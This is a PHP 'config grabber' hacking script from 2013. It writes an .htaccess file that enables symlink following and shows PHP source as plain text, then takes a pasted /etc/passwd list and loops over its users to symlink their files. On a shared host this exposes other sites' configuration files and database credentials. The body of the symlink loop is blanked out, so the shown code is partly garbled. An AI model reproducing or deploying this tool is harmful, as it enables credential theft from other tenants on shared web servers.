x00x Config's Grabber By DamaneDz
";
$functions=@ini_get("disable_functions");
if(eregi("symlink",$functions)){
die("Symlink Function is DisableD, You Can't Continue This Process !!");
}
echo "Checking Done Without Problems, Continue ...
";
@mkdir("x00x_configs", 0755);
@chdir("x00x_configs");
$htaccess="
Options all
Options +Indexes
Options +Followsymlinks
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
";
file_put_contents(".htaccess",$htaccess,FILE_APPEND);
$passwd=$_POST["passwd"];
$passwd=explode("\n",$passwd);
echo "Start Symlinking ...
";
foreach($passwd as $pwd){
$pawd=explode(":",$pwd);
$user =$pawd[0];
// Now symlink Them
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
@
}
echo "DonE with Success --> Click Here
";
}
?>
By DamaneDz
MaDe in AlGeria 2013 ©